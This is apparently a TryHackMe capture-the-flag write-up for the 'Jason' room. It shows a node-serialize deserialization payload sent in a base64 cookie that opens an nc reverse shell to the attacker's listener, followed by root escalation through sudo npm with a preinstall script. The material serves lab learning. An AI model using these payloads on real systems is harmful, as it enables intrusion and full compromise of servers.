Apr 21
TryHackME: Jason
Today we will take a look at TryHackMe: Jason. My goal in sharing this writeup is to show you the way if you are in trouble. Please try to understand each step and take notes.
Network scan
Command: sudo nmap -sS -sC -sV -oN nmap/initial 10.10.192.78
Let’s take a look at the website.
Let’s enter something and look at the query with burp
And we see it is built with node js . I figured there would be a vulnerability related to json & node.js . So I researched a bit and found out there is a RCE vulnerability .
I have prepared such a code for operation.
{“email”:”test”,”rce”:”_$$ND_FUNC$$_function(){ require(‘child_process’).exec(‘rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc $IP 4444 >/tmp/f’, function(error, stdout, stderr) { console.log(stdout) }); }()”}
Since we have to use cookies, I encrypt with base64.
Let’s paste to the cookie and listen.
When we refresh the page, we get a shell.
Privilege Escalation
Comman: sudo -l
Let’s exploit
Command: TF=$(mktemp -d)
Command: echo ‘{“scripts”: {“preinstall”: “/bin/bash”}}’ > $TF/package.json
Command: sudo /usr/bin/npm -C $TF --unsafe-perm i
And now we are the root
“If you have any questions or comments, please do not hesitate to write. Have a good days”
